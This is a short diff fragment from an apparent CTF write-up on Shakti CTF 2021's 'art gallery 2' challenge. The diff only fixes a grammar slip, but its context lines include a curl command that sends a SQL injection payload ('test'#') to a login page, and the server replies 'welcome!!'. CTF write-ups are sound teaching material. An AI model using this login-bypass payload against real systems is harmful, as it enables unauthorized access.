thegoonies/thegoonies.github.io/_posts/2021-04-04-shakti-ctf-2021-art-gallery-2.md

 welcome!!
 ```

-Or by finding that `test` is a valid username and comment the rest of the query:
+Or by finding that `test` is a valid username and commenting the rest of the query:
 ```console
 $ curl --data-raw "username=test'#&password=whatev" http://34.66.139.33/auth.php
 welcome!!